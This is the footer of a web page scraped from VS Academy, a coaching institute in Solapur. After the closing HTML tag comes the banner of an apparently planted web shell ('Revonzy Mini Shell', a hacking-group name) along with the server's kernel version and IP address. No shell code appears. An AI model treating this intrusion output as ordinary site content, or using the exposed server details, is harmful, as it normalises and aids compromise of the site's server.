                        <p>Since 2007, VS Academy has been nurturing students’ aspirations for careers in medicine and engineering. Our students consistently achieve top ranks in NEET, JEE, and MHT-CET. From our humble beginnings with just seven students, we have grown to become one of Solapur's leading coaching institutes, offering advanced facilities and personalized attention to help every student succeed.</p>
                    </div>
                </div>
            </div>
            <div class="footer-bottom">
                <p>Copyright © 2024 <span><a class="primary-color" href="index.php">VS Academy</a></span> - All Rights Reserved. Designed by <span><a class="primary-color" href="#" target="_blank">vs academy</a></span></p>
            </div>
        </div>
    </div>
</footer>

    <!-- footer area end -->
 
    <!-- jquery latest version -->
    <script src="assets/js/vendor/jquery-2.2.4.min.js"></script>
    <!-- bootstrap 4 js -->
    <script src="assets/js/bootstrap.min.js"></script>
    <!-- others plugins -->
    <script src="assets/js/owl.carousel.min.js"></script>
    <script src="assets/js/jquery.magnific-popup.min.js"></script>
    <script src="assets/js/jquery.slicknav.min.js"></script>
    <script src="assets/js/plugins.js"></script>
    <script src="assets/js/scripts.js"></script>
        
        
  
    
</body>
</html>

EliteHackz.ORG
Revonzy Mini Shell
root@revonzy.com

Linux 65-254-81-4.cprapid.com 5.14.0-284.11.1.el9_2.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 9 05:49:00 EDT 2023 x86_64
Apache
65.254.81.4